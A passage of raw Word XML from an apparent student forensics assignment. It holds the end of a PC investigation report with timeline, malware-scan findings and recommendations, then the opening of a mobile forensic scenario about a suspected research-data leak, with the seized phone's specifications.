          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Course of events Examination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACAC52D" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utilized Plaso to make a course of events of framework exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB28F6" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Connected occasions to recognize examples and expected marks of give and take.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F4880" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware Filtering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED98ED" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Transferred dubious records to VirusTotal for a multi-antivirus examine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410B8C8" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Researched any hailed documents for additional investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177906B" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393F36E7" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608D8DB9" w14:textId="02EC2B21" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3182CD79" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access Without Permission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E597A37" w14:textId="12794D86" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recognized unapproved login endeavours and admittance to delicate documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B28BB0" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP addresses and timestamps were kept in the course of events examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5CB82" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware Presence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CD4A8" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Distinguished a dubious executable record with a known malware signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D970C12" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The malware was affirmed to be available on the framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B6DC9E" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erased Records:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B715DAA" w14:textId="65F64053" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recuperated erased records containing implicating </w:t>
      </w:r>
      <w:r w:rsidR="00F661CD" w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proof. Course</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of events investigation demonstrated conscious </w:t>
      </w:r>
      <w:r w:rsidR="00F661CD" w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>endeavours</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to hide exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07230659" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B731A9" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Confinement and Regulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6465E" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Seclude the impacted framework from the organization to forestall further harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B865A05" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Contain the distinguished malware to forestall its spread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C382B71" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00F661CD" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F661CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lawful Activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF51ECB" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Share discoveries with policing possible lawful activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB3EB1" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide evidence, such as recovered files, timestamps, and IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790EA56" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F661CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Safety efforts</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4FD04" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Carry out more grounded admittance controls and confirmation measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B65BB" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Consistently screen and review framework exercises for dubious way of behaving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EAAA9F" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00F661CD" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F661CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74366D67" w14:textId="000E0973" w:rsidR="009A3F51" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The advanced legal examination uncovered proof of unapproved access, malware presence, and purposeful </w:t>
      </w:r>
      <w:r w:rsidR="00F661CD" w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>endeavours</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to disguise exercises on Mr. John Doe's PC framework. The discoveries give a premise to lawful activity and prescribe safety efforts to forestall future occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF11B79" w14:textId="1BB7E865" w:rsidR="009A3F51" w:rsidRDefault="009A3F51" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795B32D8" w14:textId="59C6E485" w:rsidR="009A3F51" w:rsidRDefault="009A3F51" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E399BC8" w14:textId="431A1CDA" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD19ED3" w14:textId="13C6F75F" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530CAE82" w14:textId="288F9781" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B40762" w14:textId="408BF412" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541F3C97" w14:textId="4D6455D4" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3D9237" w14:textId="5E1F068B" w:rsidR="0020337D" w:rsidRPr="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674AF609" w14:textId="4D3C71A4" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Task [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E2D5F" w14:textId="77777777" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44202CDA" w14:textId="19074992" w:rsidR="0020337D" w:rsidRPr="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a Team Activity. Simulate a mobile forensic investigation based on the given scenario. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21657B6B" w14:textId="77777777" w:rsidR="0020337D" w:rsidRPr="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CB0A9D" w14:textId="15632FFC" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19348F45" w14:textId="68CB315F" w:rsidR="0020337D" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5631F243" w14:textId="402C6210" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The company suspects a Technical Officer (TO) involved in an Artificial Intelligence-based self-driving car project of potentially compromising sensitive research data to competitors. The TO, who took numerous unreported days off and undisclosed national/international trips, is suspected of unauthorized information release. Legal proceedings have begun, and the company has acquired the TO's mobile phone, currently password-protected. Our team is tasked with a thorough analysis to validate the allegations, ensuring evidence integrity and admissibility in court. The comprehensive report should address the suspected data breach and provide insights into any unauthorized activities related to the project, aiding the ongoing legal proceedings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BACDBE" w14:textId="7673A1E6" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222AF6AE" w14:textId="42496854" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Initial Examination of the Phone Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51B590" w14:textId="13895437" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Model: Note 14 (16G)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19E430" w14:textId="03E805FE" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Brand: Ulefone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53D7DC" w14:textId="773A963F" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Colour: Lavender Purple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CE545" w14:textId="1DA2D8D6" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→IMEI-1: 355617730545789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E445372" w14:textId="0B655D97" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→IMEI-2: 355617730545771</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E420BE9" w14:textId="4AC42725" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→S/N:3102SH1010027469</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFDF22" w14:textId="621EA69B" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">→MediaTek </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Helio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> A22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAFEE00" w14:textId="4CEA854A" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→3GB RAM+16GB ROM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61123BB4" w14:textId="769189C2" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>6.52-inch HD+ Display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192887D8" w14:textId="485EC266" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>8MP Main Camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F03A2B" w14:textId="7654A4AF" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5MP Front Camera</w:t>
      </w:r>
    </w:p>
